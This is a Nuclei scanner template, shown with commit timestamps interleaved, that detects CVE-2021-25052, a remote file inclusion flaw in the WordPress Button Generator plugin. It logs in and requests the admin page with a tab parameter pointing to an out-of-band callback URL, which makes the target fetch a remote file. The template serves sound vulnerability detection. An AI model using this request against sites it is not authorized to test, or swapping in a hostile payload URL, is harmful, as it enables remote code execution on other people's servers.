2022-02-08 01:07:19 +00:00
id : CVE-2021-25052
info :
2022-06-27 16:20:40 +00:00
name : WordPress Button Generator <2.3.3 - Remote File Inclusion
2022-02-08 01:07:19 +00:00
author : cckuailong
severity : high
2022-06-27 18:32:06 +00:00
description : WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.
2022-02-08 01:07:19 +00:00
reference :
- https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
- https://nvd.nist.gov/vuln/detail/CVE-2021-25052
2022-05-17 09:18:12 +00:00
- https://plugins.trac.wordpress.org/changeset/2641639/button-generation
2022-02-08 01:07:19 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2021-25052
cwe-id : CWE-352
2022-08-27 04:41:18 +00:00
tags : wp-plugin,authenticated,wpscan,cve,cve2021,rfi,wp,wordpress
2022-02-08 01:07:19 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
2022-02-08 19:23:44 +00:00
2022-02-08 01:07:19 +00:00
- type : word
part : interactsh_protocol
2022-02-08 19:23:44 +00:00
name : http
2022-02-08 01:07:19 +00:00
words :
2022-02-08 19:23:44 +00:00
- "http"
2022-06-27 16:20:40 +00:00
2022-06-28 02:45:44 +00:00
- type : status
status :
- 200
2022-06-27 16:20:40 +00:00
# Enhanced by mp on 2022/06/27